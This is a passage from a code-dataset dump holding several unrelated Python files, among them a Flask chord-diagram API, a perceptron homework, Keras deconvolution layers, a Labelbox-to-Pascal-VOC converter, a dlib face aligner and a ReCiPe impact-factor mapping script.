chord_form.validate_on_submit():\n return render_template(\n 'index.html',\n diagram=create_diagram(chord_form),\n chord_form=chord_form,\n dl_form=dl_form\n )\n\n return render_template(\n 'index.html',\n diagram=create_diagram(chord_form),\n chord_form=chord_form,\n dl_form=dl_form\n )\n\n@my_view.route('/download', methods=['POST'])\ndef download_as():\n # a hedged sketch: assumes the POST form carries the SVG markup in\n # 'imgdata' and the target type in 'format' (these field names are\n # assumptions, not taken from the form definitions)\n fmt = request.form.get('format', 'svg')\n imgdata = request.form.get('imgdata', '').encode('utf-8')\n if fmt == 'png_t':\n # convert using cairosvg\n result = cairosvg.svg2png(bytestring=imgdata)\n elif fmt == 'png':\n with Image(blob=imgdata) as i:\n result = i.convert('png').make_blob()\n else:\n result = imgdata\n\n return send_file(io.BytesIO(result), as_attachment=True, attachment_filename='chord.{}'.format(fmt))\n\n@my_view.route('/api/v1/chord/', methods=['POST'])\ndef generate_chord():\n \"\"\"\n process the request body and return SVG content (no XML header)\n \"\"\"\n content = request.get_json(silent=True)\n chordobj = MultiFingerChord(\n positions=content.get('positions', '0000'),\n fingers=content.get('fingers','----'),\n barre=content.get('barre', None),\n title=content.get('title', 'Am7'),\n extras=content.get('extras', None),\n style=DEFAULT_STYLE # base style imported from .config\n ).render()\n chordobj.seek(0)\n header, data = chordobj.read().splitlines()\n\n # export type\n fmt = content.get('format', 'svg')\n\n if fmt != 'svg':\n content_type = 'image/png'\n ext = 'png'\n else:\n content_type = 'image/svg+xml'\n ext = 'svg'\n\n # OK, we have a chord object, let's return it\n if fmt == 'png_t':\n # do cairo stuff\n data = cairosvg.svg2png(bytestring=data.encode('utf-8'))\n\n if fmt == 'png':\n with Image(blob=data.encode('utf-8')) as i:\n data = i.convert('png').make_blob()\n\n response = make_response(data)\n response.headers.set('Content-Type', content_type)\n response.headers.set('Content-Disposition', 'attachment', filename=\"{}.{}\".format(content.get('title'), ext))\n\n return response\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183406928","text":"import argparse\nimport pprint\nimport numpy as np\nfrom nbc import read_data, zero_one_loss\nimport crossv\nimport matplotlib.pyplot as plt\nimport pylab\n\ndef define_attr(data):\n\tattr = data[0][1:]\n\tnum_rows = len(data)\n\tnum_attr = len(attr)\n\tattr_value_dict = {}\n\n\tfor i in range(num_attr):\n\t\tattr_values = [data[j][i + 1] for j in range(1,num_rows)]\n\t\tvalues = 
set(attr_values)\n\t\tattr_value_dict[attr[i]] = dict([(key, value) for value, key in enumerate(values, 1)])\n\n\treturn attr_value_dict\n\ndef transform_data(data, value_dict):\n\tattr = data[0][1:]\n\tnum_rows = len(data)\n\tnum_attr = len(attr)\n\n\tfor i in range(1,num_rows):\n\t\tdata[i][0] = 0 if data[i][0] == '0' else 1\n\t\tfor j in range(num_attr):\n\t\t\t'''try:\n\t\t\t\tdata[i][j] = float(data[i][j].strip())\n\t\t\texcept Exception as e:'''\n\t\t\tdata[i][j + 1] = value_dict[attr[j]][data[i][j + 1]]\n\n\treturn data\n\ndef predict(data, weights, bias):\n\t# data = np.array(data)\n\t# print data\n\tprediction = []\n\tproduct = data.dot(weights)\n\t# print product\n\t#prediction = 1 if product > -1*bias else 0\n\tfor i in np.nditer(product):\n\t\tprediction.append(1 if i > -1*bias else 0)\n\treturn prediction\n\ndef training(train_data, true_class, alpha, T):\n\tnum_attr = len(train_data[0])\n\tweights = np.zeros(num_attr)\n\tbias = 0\n\t\n\tfor e in range(T):\n\t\twrong = 0\n\t\tfor row_num in range(train_data.shape[0]):\n\t\t\t#print \"initial weights:\", weights\n\t\t\tprediction = predict(train_data[row_num], weights, bias)\n\t\t\t# print prediction\n\t\t\t# print true_class[row_num]\n\t\t\tif prediction[0] != true_class[row_num]:\n\t\t\t\t# bias += alpha * error\n\t\t\t\twrong += 1\n\t\t\t\tchange = np.multiply(alpha * (true_class[row_num]-prediction[0]), train_data[row_num])\n\t\t\t\t# print change\n\t\t\t\tweights = np.add(weights, change)\n\t\t\t\tbias += alpha * (true_class[row_num]-prediction[0])\n\t\t\t# prediction = predict(train_data[row_num], weights, bias)\n\t\t\t# print prediction, \"\\n\"\n\t\t\t#print \"updated weights:\", weights\n\t\t# print \"error rate\", float(wrong)/train_data.shape[0]\n\treturn weights\n\ndef make_matrix(train_data):\n\tvalue_dict = define_attr(train_data)\n\ttrans_data = transform_data(train_data, value_dict)\n\ttrans_data.pop(0)\n\ttrue_class = [data_row.pop(0) for data_row in trans_data]\n\n\tdata_mat = np.array(trans_data)\n\treturn data_mat, true_class\n\n\ndef extract_weights(train_data):\n\tdata_mat, true_class = make_matrix(train_data)\n\t#predict(data_mat, None, None)\n\n\treturn training(data_mat, true_class, 0.5, 100)\n\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"datafile\", help=\"data file (yelp2.csv)\", default=None)\n\targs = parser.parse_args()\n\n\tif args.datafile == None: raise Exception(\"The data file is not found\")\n\n\t# train_data = read_data(args.training)\n\n\t# extract_weights(train_data)\n\n\ttraining_set, test_set = crossv.split_data(args.datafile)\n\tresult = crossv.validation(training_set, test_set)\n\n\tresult_p = crossv.validation(training_set, test_set, \"perceptron\")\n\n # pprint.pprint(result)\n\tx_axis = result.keys()\n\tx_axis.sort()\n\n\tzero_one_nbc = []\n\n\tzero_one_perceptron = []\n # square_perceptron = []\n\n\tbaseline = []\n\n\tfor index in x_axis:\n\t\tzero_one_nbc.append(result[index][0])\n\t\tbaseline.append(result[index][2])\n\t\tzero_one_perceptron.append(result_p[index])\n\tpylab.plot(x_axis, zero_one_nbc, label=\"nbc\")\n\tpylab.plot(x_axis, zero_one_perceptron, label=\"perceptron\")\n\tpylab.plot(x_axis, baseline, label=\"baseline\")\n\tpylab.legend(loc='upper left')\n\tpylab.show()\n\t# value_dict = define_attr(train_data)\n\t# trans_data = transform_data(train_data, value_dict)\n\t# trans_data.pop(0)\n\t# true_class = [data_row.pop(0) for data_row in trans_data]\n\n\t# data_mat = np.array(trans_data)\n\t# #predict(data_mat, None, None)\n\n\t# 
weights = training(data_mat, true_class, 2, 1000)\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"hw3/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"614642459","text":"import numpy as np\n\nfrom keras.layers import (\n Input,\n Dense)\nfrom keras.layers.convolutional import (\n Convolution2D)\nfrom keras import backend as K\n\n\nclass DLayer:\n def __init__(self, layer):\n self.layer = layer\n self.up_data = None\n self.down_data = None\n self.up_func = None\n self.down_func = None\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to compute activation in forward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Activation\n \"\"\"\n data = self.up_func([data, learning_phase])\n self.up_data = data if K.backend() == 'theano' else data[0]\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to compute activation in backward pass\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Activation\n \"\"\"\n data = self.down_func([data, learning_phase])\n self.down_data = data if K.backend() == 'theano' else data[0]\n return self.down_data\n\n\nclass DConvolution2D(DLayer):\n \"\"\"\n A class to define forward and backward operation on Convolution2D\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Convolution2D layer, whose configuration\n will be used to initiate DConvolution2D(input_shape,\n output_shape, weights)\n \"\"\"\n super(DConvolution2D, self).__init__(layer)\n\n weights = layer.get_weights()\n W = weights[0]\n b = weights[1]\n\n # Set up_func for DConvolution2D\n input = Input(shape=layer.input_shape[1:])\n\n output = Convolution2D(\n nb_filter=layer.nb_filter,\n nb_row=layer.nb_row,\n nb_col=layer.nb_col,\n border_mode=layer.border_mode,\n weights=[W, b]\n )(input)\n self.up_func = _K_function([input, K.learning_phase()], output)\n\n # Flip W horizontally and vertically,\n # and set down_func for DConvolution2D\n if K.image_dim_ordering() == 'th':\n W = np.transpose(W, (1, 0, 2, 3))\n W = W[:, :, ::-1, ::-1]\n nb_down_filter = W.shape[0]\n nb_down_row = W.shape[2]\n nb_down_col = W.shape[3]\n else:\n W = np.transpose(W, (0, 1, 3, 2))\n W = W[::-1, ::-1, :, :]\n nb_down_filter = W.shape[3]\n nb_down_row = W.shape[0]\n nb_down_col = W.shape[1]\n b = np.zeros(nb_down_filter)\n input = Input(shape=layer.output_shape[1:])\n output = Convolution2D(\n nb_filter=nb_down_filter,\n nb_row=nb_down_row,\n nb_col=nb_down_col,\n border_mode='same',\n weights=[W, b]\n )(input)\n self.down_func = _K_function([input, K.learning_phase()], output)\n\n\nclass DDense(DLayer):\n \"\"\"\n A class to define forward and backward operation on Dense\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Dense layer, whose configuration\n will be used to initiate DDense(input_shape,\n output_shape, weights)\n \"\"\"\n super(DDense, self).__init__(layer)\n weights = layer.get_weights()\n W = weights[0]\n b = weights[1]\n\n # Set up_func for DDense\n input = Input(shape=layer.input_shape[1:])\n output = Dense(output_dim=layer.output_shape[1],\n weights=[W, b])(input)\n self.up_func = _K_function([input, K.learning_phase()], output)\n\n # Transpose W and set down_func for DDense\n W = W.transpose()\n 
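# Reusing the learned weights for the backward pass: for a Dense layer the\n # transposed matrix W.T maps activations from the output space back to the\n # input space, so down_func below is simply a Dense layer with swapped\n # input/output dimensions and a zero bias.\n 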
self.input_shape = layer.input_shape\n self.output_shape = layer.output_shape\n b = np.zeros(self.input_shape[1])\n flipped_weights = [W, b]\n input = Input(shape=self.output_shape[1:])\n output = Dense(\n output_dim=self.input_shape[1],\n weights=flipped_weights)(input)\n self.down_func = _K_function([input, K.learning_phase()], output)\n\n\nclass DPooling(DLayer):\n \"\"\"\n A class to define forward and backward operation on Pooling\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Pooling layer, whose configuration\n will be used to initiate DPooling(input_shape,\n output_shape, weights)\n \"\"\"\n super(DPooling, self).__init__(layer)\n self.poolsize = layer.pool_size\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to compute pooling output in forward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Pooled result\n \"\"\"\n [self.up_data, self.switch] = \\\n self.__max_pooling_with_switch(data, self.poolsize)\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to compute unpooling output in backward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Unpooled result\n \"\"\"\n self.down_data = self.__max_unpooling_with_switch(data, self.switch)\n return self.down_data\n\n def __max_pooling_with_switch(self, input, poolsize):\n \"\"\"\n Compute pooling output and switch in forward pass, switch stores\n location of the maximum value in each poolsize * poolsize block\n # Arguments\n input: data to be pooled\n poolsize: size of pooling operation\n # Returns\n Pooled result and Switch\n \"\"\"\n switch = np.zeros(input.shape)\n\n if K.image_dim_ordering() == 'th':\n samples, dims, rows, cols = input.shape\n else:\n samples, rows, cols, dims = input.shape\n\n row_poolsize = int(poolsize[0])\n col_poolsize = int(poolsize[1])\n rows = rows // row_poolsize\n cols = cols // col_poolsize\n\n if K.image_dim_ordering() == 'th':\n out_shape = samples, dims, rows, cols\n else:\n out_shape = samples, rows, cols, dims\n\n pooled = np.zeros(out_shape)\n\n for sample in range(samples):\n for dim in range(dims):\n for row in range(rows):\n for col in range(cols):\n if K.image_dim_ordering() == 'th':\n patch = input[sample,\n dim,\n row * row_poolsize: (row + 1) * row_poolsize,\n col * col_poolsize: (col + 1) * col_poolsize]\n max_value = patch.max()\n pooled[sample, dim, row, col] = max_value\n else:\n patch = input[sample,\n row * row_poolsize: (row + 1) * row_poolsize,\n col * col_poolsize: (col + 1) * col_poolsize,\n dim]\n max_value = patch.max()\n pooled[sample, row, col, dim] = max_value\n\n max_col_index = patch.argmax(axis=1)\n max_cols = patch.max(axis=1)\n max_row = max_cols.argmax()\n max_col = max_col_index[max_row]\n if K.image_dim_ordering() == 'th':\n switch[sample,\n dim,\n row * row_poolsize + max_row,\n col * col_poolsize + max_col] = 1\n else:\n switch[sample,\n row * row_poolsize + max_row,\n col * col_poolsize + max_col,\n dim] = 1\n\n return [pooled, switch]\n\n # Compute unpooled output using pooled data and switch\n def __max_unpooling_with_switch(self, input, switch):\n \"\"\"\n Compute unpooled output using pooled data and switch\n # Arguments\n input: data to be pooled\n poolsize: size of pooling operation\n switch: switch storing location of each elements\n # Returns\n Unpooled result\n \"\"\"\n if K.image_dim_ordering() == 'th':\n row_i, 
col_i = 2, 3\n else:\n row_i, col_i = 1, 2\n\n tile = np.ones((switch.shape[row_i] // input.shape[row_i],\n switch.shape[col_i] // input.shape[col_i]))\n\n if K.image_dim_ordering() == 'th':\n out = np.kron(input, tile)\n else:\n out = np.kron(np.transpose(input, (0, 3, 1, 2)), tile)\n out = np.transpose(out, (0, 2, 3, 1))\n\n unpooled = out * switch\n return unpooled\n\n\nclass DActivation(DLayer):\n \"\"\"\n A class to define forward and backward operation on Activation\n \"\"\"\n\n def __init__(self, layer, linear=False):\n \"\"\"\n # Arguments\n layer: an instance of Activation layer, whose configuration\n will be used to initiate DActivation(input_shape,\n output_shape, weights)\n \"\"\"\n super(DActivation, self).__init__(layer)\n self.linear = linear\n self.activation = layer.activation\n input = K.placeholder(shape=layer.output_shape)\n\n output = self.activation(input)\n # According to the original paper,\n # In forward pass and backward pass, do the same activation(relu)\n self.up_func = _K_function(\n [input, K.learning_phase()], output)\n self.down_func = _K_function(\n [input, K.learning_phase()], output)\n\n\nclass DFlatten(DLayer):\n \"\"\"\n A class to define forward and backward operation on Flatten\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Flatten layer, whose configuration\n will be used to initiate DFlatten(input_shape,\n output_shape, weights)\n \"\"\"\n super(DFlatten, self).__init__(layer)\n self.shape = layer.input_shape[1:]\n self.up_func = _K_function(\n [layer.input, K.learning_phase()], layer.output)\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to unflatten input in backward pass\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Recovered data\n \"\"\"\n new_shape = [data.shape[0]] + list(self.shape)\n assert np.prod(self.shape) == np.prod(data.shape[1:])\n self.down_data = np.reshape(data, new_shape)\n return self.down_data\n\n\nclass DInput(DLayer):\n \"\"\"\n A class to define forward and backward operation on Input\n \"\"\"\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to operate input in forward pass, the input and output\n are the same\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n data\n \"\"\"\n self.up_data = data\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to operate input in backward pass, the input and output\n are the same\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n data\n \"\"\"\n self.down_data = data\n return self.down_data\n\n\ndef _K_function(inputs, out):\n if K.backend() == 'theano' or isinstance(out, (list, tuple)):\n return K.function(inputs, out)\n else:\n return K.function(inputs, [out])","sub_path":"deconvnet/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":12265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610267052","text":"import Augmentor\nimport os\nimport json\nimport requests\nimport cv2\nimport datetime as dt\nimport numpy as np\nfrom PIL import Image\nfrom shapely import wkt\nfrom pascal_voc_writer import Writer as PascalWriter\n\nfrom .generator.pascal_voc import PascalVOCGenerator\n\n\nclass LabeledImagePascalVOC:\n \"\"\" Custom class matching returned json object of labelbox.io. 
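\n\n A minimal construction sketch (keyword keys inferred from __init__ below; the logger argument is any callable such as logging.getLogger, and all values here are illustrative only):\n\n LabeledImagePascalVOC(logging.getLogger, **{\n 'ID': '1', 'Labeled Data': 'https://example.com/img.jpg',\n 'Created By': 'me', 'Project Name': 'demo', 'Label': {},\n 'Seconds to Label': 12.3, 'Images Dir': 'images',\n 'Resized Image Dir': 'resized', 'Annotations Dir': 'annotations',\n 'Required Image Height': 300, 'Required Image Width': 300})\n 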
\"\"\"\n\n ANNOTATION_PASCAL_VOC = 'Pascal VOC'\n SKIPPED_LABEL = 'Skip'\n\n def __init__(self, logger, *args, **kwargs):\n self._logger = logger(__name__)\n self._id = kwargs['ID']\n self._source_img_url = kwargs['Labeled Data']\n self._created_by = kwargs['Created By']\n self._project_name = kwargs['Project Name']\n self._seconds_to_label = kwargs['Seconds to Label']\n self._images_dir = kwargs['Images Dir']\n self._resized_image_dir = kwargs['Resized Image Dir']\n self._annotations_dir = kwargs['Annotations Dir']\n self._required_img_height = kwargs['Required Image Height']\n self._required_img_width = kwargs['Required Image Width']\n self.label_names = set()\n self._file_name = self._source_img_url.rsplit('/', 1)[-1].split('.')[0]\n self._file_ext = '.' + \\\n self._source_img_url.split(\"/\")[-1].split('.')[1]\n self._download_image(kwargs['Label'])\n self._resize_image(self._image_file_path)\n self._generate_pascal_voc_file(logger, kwargs['Label'], apply_reduction=True, debug=True)\n\n def _download_image(self, json_labels):\n \"\"\" Download image from provided link (Cloud link).\"\"\"\n file_name = self._file_name + self._file_ext\n self._image_file_path = os.path.join(self._images_dir, file_name)\n\n if not os.path.exists(self._image_file_path):\n try:\n response = requests.get(self._source_img_url, stream=True)\n response.raw.decode_content = True\n image = Image.open(response.raw)\n self._img_width, self._img_height = image.size\n image.save(self._image_file_path, format=image.format)\n self._logger.info('Downloaded image form source {} at {}'.format(\n self._source_img_url, self._image_file_path))\n\n except requests.exceptions.MissingSchema as e:\n self._logger.exception(\n '\"source_image_url\" attribute must be a URL.')\n except requests.exceptions.ConnectionError as e:\n self._logger.exception(\n 'Failed to fetch image from {}'.format(self._source_img_url))\n else:\n image = Image.open(self._image_file_path)\n self._img_width, self._img_height = image.size\n self._logger.warn('WARN: Skipping file download since it already exist @ {}\\n'.format(\n self._image_file_path))\n\n def _resize_image(self, image_path):\n file_name = self._file_name + self._file_ext\n self._resized_image_path = os.path.join(\n self._resized_image_dir, file_name)\n\n img = cv2.imread(image_path)\n\n height, width = img.shape[:2]\n\n self._aspect_ratio = float(width)/height\n\n scaled_height = 300\n scaled_width = 300\n\n # interpolation method\n if height > self._required_img_height or width > self._required_img_width: # shrinking image\n interp = cv2.INTER_AREA\n else: # stretching image\n interp = cv2.INTER_CUBIC\n\n # aspect ratio of image\n\n # compute scaling and pad sizing\n if self._aspect_ratio > 1: # horizontal image\n new_width = scaled_width\n new_height = np.round(new_width/self._aspect_ratio).astype(int)\n pad_vert = (scaled_height-new_height)/2\n self._pad_top, self._pad_bot = np.floor(\n pad_vert).astype(int), np.ceil(pad_vert).astype(int)\n self._pad_left, self._pad_right = 0, 0\n elif self._aspect_ratio < 1: # vertical image\n new_height = scaled_height\n new_width = np.round(new_height*self._aspect_ratio).astype(int)\n pad_horz = (scaled_width-new_width)/2\n self._pad_left, self._pad_right = np.floor(\n pad_horz).astype(int), np.ceil(pad_horz).astype(int)\n self._pad_top, self._pad_bot = 0, 0\n else: # square image\n new_height, new_width = scaled_height, scaled_width\n self._pad_left, self._pad_right, self._pad_top, self._pad_bot = 0, 0, 0, 0\n\n # factors to scale bounding box 
values\n self._x_factor = float(width) / self._required_img_width\n self._y_factor = float(height) / (self._required_img_height - self._pad_bot - self._pad_top)\n\n # set pad color: a 3-channel black for color images, a scalar otherwise\n padColor = [0]*3 if len(img.shape) == 3 else 0\n\n # scale and pad\n scaled_img = cv2.resize(img, (new_width, new_height), interpolation=interp)\n scaled_img = cv2.copyMakeBorder(\n scaled_img, self._pad_top, self._pad_bot, self._pad_left, self._pad_right, borderType=cv2.BORDER_CONSTANT, value=padColor)\n\n if not os.path.exists(self._resized_image_path):\n cv2.imwrite(self._resized_image_path, scaled_img)\n self._logger.info('Resized image at {}.jpg'.format(\n self._resized_image_path))\n else:\n self._logger.warn('WARN: Skipping file resizing since it already exist @ {}\n'.format(\n self._resized_image_path))\n\n def _generate_pascal_voc_file(self, logger, json_labels, apply_reduction=False, debug=False):\n \"\"\" Transform WKT polygon to pascal voc. \"\"\"\n config = {\n 'labelbox_id': self._id,\n 'project_name': self._project_name,\n 'json_labels': json_labels,\n 'annotation_dir': self._annotations_dir,\n 'apply_reduction': apply_reduction,\n 'debug': debug\n }\n\n if apply_reduction:\n config.update({\n 'image_path': self._resized_image_path,\n 'image_width': self._required_img_width,\n 'image_height': self._required_img_height,\n 'x_factor': self._x_factor,\n 'y_factor': self._y_factor,\n 'pad_top': self._pad_top,\n 'pad_left': self._pad_left,\n })\n else:\n config.update({\n 'image_path': self._image_file_path,\n 'image_width': self._img_width,\n 'image_height': self._img_height,\n 'x_factor': 1,\n 'y_factor': 1,\n 'pad_top': 0,\n 'pad_left': 0,\n })\n generator = PascalVOCGenerator(logger, config)\n self.label_names.update(generator.label_names)\n","sub_path":"extractor/core/data/labelbox.py","file_name":"labelbox.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650018355","text":"class Solution(object):\n def check(self, s):\n if len(s) < 2:\n return True\n elif len(s) == 2:\n return \"10\" <= s <= \"99\" # prevent 01,02,03...\n else:\n return \"100\" <= s <= \"255\" # prevent 256,257...\n\n def dfs(self, depth, maxDepth, s, startPos, pos, ans):\n\n if depth == maxDepth:\n if startPos == len(s):\n address = s[0:pos[0]]\n for i in range(1, maxDepth):\n address = address + '.' + s[pos[i - 1]:pos[i]]\n ans.append(address)\n return\n\n for i in range(startPos + 1, startPos + 4):\n if self.check(s[startPos: i]):\n pos[depth] = i\n self.dfs(depth + 1, 4, s, i, pos, ans)\n\n def restoreIpAddresses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n ans = []\n pos = [0, 0, 0, 0]\n self.dfs(0, 4, s, 0, pos, ans)\n return ans\n\n\ns = Solution()\ns.restoreIpAddresses(\"0000\")","sub_path":"Algorithm/Restore IP Addresses/Restore IP Addresses.py","file_name":"Restore IP Addresses.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589016206","text":"from enum import Enum\r\n\r\nimport dlib\r\nimport numpy as np\r\nimport skimage.transform as tr\r\n\r\n\r\nclass FaceDetectorException(Exception):\r\n pass\r\n\r\n\r\nclass FaceDetector:\r\n def __init__(self):\r\n self.detector = dlib.get_frontal_face_detector()\r\n\r\n def detect_faces(self, image, *, upscale_factor=1, greater_than=None, get_top=None):\r\n try:\r\n face_rects = list(self.detector(image, upscale_factor))\r\n except Exception as e:\r\n raise FaceDetectorException(e.args)\r\n\r\n if greater_than is not None:\r\n face_rects = list(\r\n filter(\r\n lambda r: r.height() > greater_than and r.width() > greater_than,\r\n face_rects,\r\n )\r\n )\r\n\r\n face_rects.sort(key=lambda r: r.width() * r.height(), reverse=True)\r\n\r\n if get_top is not None:\r\n return face_rects[:get_top]\r\n\r\n return face_rects\r\n\r\n\r\nclass FaceAlignMask(Enum):\r\n INNER_EYES_AND_BOTTOM_LIP = [39, 42, 57]\r\n OUTER_EYES_AND_NOSE = [36, 45, 33]\r\n\r\n\r\nclass FaceAligner:\r\n def __init__(self, dlib_predictor_path, face_template_path):\r\n self.predictor = dlib.shape_predictor(dlib_predictor_path)\r\n self.face_template = np.load(face_template_path)\r\n\r\n def get_landmarks(self, image, face_rect):\r\n points = self.predictor(image, face_rect)\r\n return np.array(list(map(lambda p: [p.x, p.y], points.parts())))\r\n\r\n def align_face(\r\n self,\r\n image,\r\n face_rect,\r\n *,\r\n dim=96,\r\n border=0,\r\n mask=FaceAlignMask.INNER_EYES_AND_BOTTOM_LIP\r\n ):\r\n mask = np.array(mask.value)\r\n\r\n landmarks = self.get_landmarks(image, face_rect)\r\n proper_landmarks = border + dim * self.face_template[mask]\r\n A = np.hstack([landmarks[mask], np.ones((3, 1))]).astype(np.float64)\r\n B = np.hstack([proper_landmarks, np.ones((3, 1))]).astype(np.float64)\r\n T = np.linalg.solve(A, B).T\r\n\r\n return tr.warp(\r\n image,\r\n tr.AffineTransform(T).inverse,\r\n output_shape=(dim + 2 * border, dim + 2 * border),\r\n order=3,\r\n mode=\"constant\",\r\n cval=0,\r\n clip=True,\r\n preserve_range=True,\r\n )\r\n\r\n def align_faces(self, image, face_rects, *args, **kwargs):\r\n result = []\r\n\r\n for rect in face_rects:\r\n result.append(self.align_face(image, rect, *args, **kwargs))\r\n\r\n return result\r\n\r\n\r\ndef clip_to_range(img):\r\n return img / 255.0\r\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99807442","text":"# -*- coding: utf-8 -*-\nimport utils, os, pandas, numpy, MasterData, time\nfrom copy import copy\n\n#this script takes the mapping ILCD to ecoinvent and creates the \n#public excel file of the mapped CFs, and the standard method xlsx\n\ndef apply_status(x):\n if utils.is_empty(x[0]):\n return 'method orphan'\n elif utils.is_empty(x[1]):\n return 'ecoinvent orphan'\n else:\n return 'mapped'\n\ndef mapping_to_mapped(version):\n ecoQuery_folder = r'C:\Dropbox (ecoinvent)\ei-int\technical\internal\LCIA management\{}\ecoQuery 
files'.format(version)\n mapping_folder = r'C:\Dropbox (ecoinvent)\ei-int\technical\internal\LCIA management\{}\mapping files'.format(version)\n \n #load category mapping\n filename = 'category_mapping_{}.xlsx'.format(version)\n tab = 'categories'\n category_mapping = utils.read_excel(mapping_folder, filename, tab)\n tab = 'methods'\n method_uuid = utils.read_excel(mapping_folder, filename, tab)\n method_uuid = method_uuid.set_index('method')\n \n #load ee mapping\n filename = 'recipe_mapping_3.5.xlsx'\n tab = 'Sheet1'\n ee_mapping = utils.read_excel(mapping_folder, filename, tab)\n ee_mapping = utils.replace_empty_in_df(ee_mapping, '')\n category_mapping['ecoinvent name'] = category_mapping[\n ['category name in ecoinvent', 'indicator name in ecoinvent']].apply(\n lambda x: x[0] + '//' + x[1], axis = 1)\n dfs = []\n def apply_scaling(x):\n if utils.is_empty(x[1]):\n return ''\n else:\n return x[1] * x[0]\n def apply_mapped_correction(x):\n to_correct = False\n if x[0] == 'mapped':\n to_correct = True\n for u in tuple(x.to_dict().values())[1:]:\n if not utils.is_empty(u):\n to_correct = False\n break\n return to_correct\n for method_name in ['ReCiPe Midpoint (I) V1.13', 'ReCiPe Midpoint (H) V1.13', 'ReCiPe Midpoint (E) V1.13']:\n #load CFs\n print(method_name)\n tab = 'CFs'\n filename = method_uuid.loc[method_name, 'standard excel filename']\n method = utils.read_excel(ecoQuery_folder, filename, tab)\n index = ['simapro name', 'simapro compartment', 'simapro subcompartment', 'simapro unit']\n method = method.rename(columns = dict(zip(['substance', 'compartment', 'subcompartment', 'unit'], index)))\n df = ee_mapping.set_index(index).join(method.set_index(index), how = 'outer').reset_index()\n df = utils.replace_empty_in_df(df, '')\n for col in df:\n df = df.replace(to_replace = {col: {'(no match)': ''}})\n category_mapping_ = category_mapping[category_mapping['method name in ecoinvent'].apply(\n lambda x: method_name in x)]\n d = dict(zip(list(category_mapping_['category name in method']), list(category_mapping_['ecoinvent name'])))\n cols = list(d.keys())\n cols.insert(0, 'status')\n df['status'] = df[['ecoinvent name', 'simapro name']].apply(apply_status, axis = 1)\n c = df[cols].apply(apply_mapped_correction, axis = 1)\n for col in index:\n df.loc[c, col] = ''\n df.loc[c, 'status'] = 'ecoinvent orphan'\n df = df.rename(columns = d)\n #convert CFs using factor\n mapped = df[df['status'] == 'mapped']\n df = df[df['status'] != 'mapped']\n \n for col in d.values():\n mapped[col] = mapped[['conversion factor', col]].apply(apply_scaling, axis = 1)\n df = pandas.concat([mapped, df])\n \n #write mapped to excel\n df['comment'] = ''\n columns = [\n 'ecoinvent name', 'ecoinvent compartment', 'ecoinvent subcompartment', 'ecoinvent unit', \n 'simapro name', 'simapro compartment', 'simapro subcompartment', 'simapro unit', \n 'status', 'conversion factor', 'comment']\n columns.extend(tuple(d.values()))\n sel = utils.dataframe_to_series(method_uuid.loc[method_name])\n dfs.append((df, sel['tab in mapped'], columns))\n columns = ['method name in ecoinvent', 'category name in ecoinvent', 'indicator name in ecoinvent', 'unit']\n category_mapping = category_mapping.rename(columns = {'unit in ecoinvent': 'unit'})\n dfs.append((category_mapping, 'units', columns))\n \n read_me = [['', '']]*7 # space for logo\n read_me.extend([\n ['© ecoinvent {}'.format(utils.timestamp().split('-')[0])], \n ['python script', os.path.realpath(__file__)], \n ['file generation date', utils.timestamp()], \n ['file purpose', 'This file shows the explicit correspondence between ecoinvent nomenclature, method nomenclature, and associated CFs'], \n ['method version', '1.13'], \n ['source', 'as found in Simapro'], \n ])\n filename = utils.remove_forbiden_in_filename(sel['mapped excel filename'].format(version))\n utils.dataframe_to_excel(ecoQuery_folder, filename, dfs, read_me = read_me, feedback = True)\nif __name__ == '__main__':\n mapping_to_mapped('3.5')","sub_path":"projects/LCIA_management/recipe/ReCiPe_mapping_to_mapped.py","file_name":"ReCiPe_mapping_to_mapped.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"448032724","text":"\n# This file is in charge of receiving the plate that was read and deciding\n# whether to let a vehicle through or not, depending on its configuration.\n# It also checks whether the plate is registered 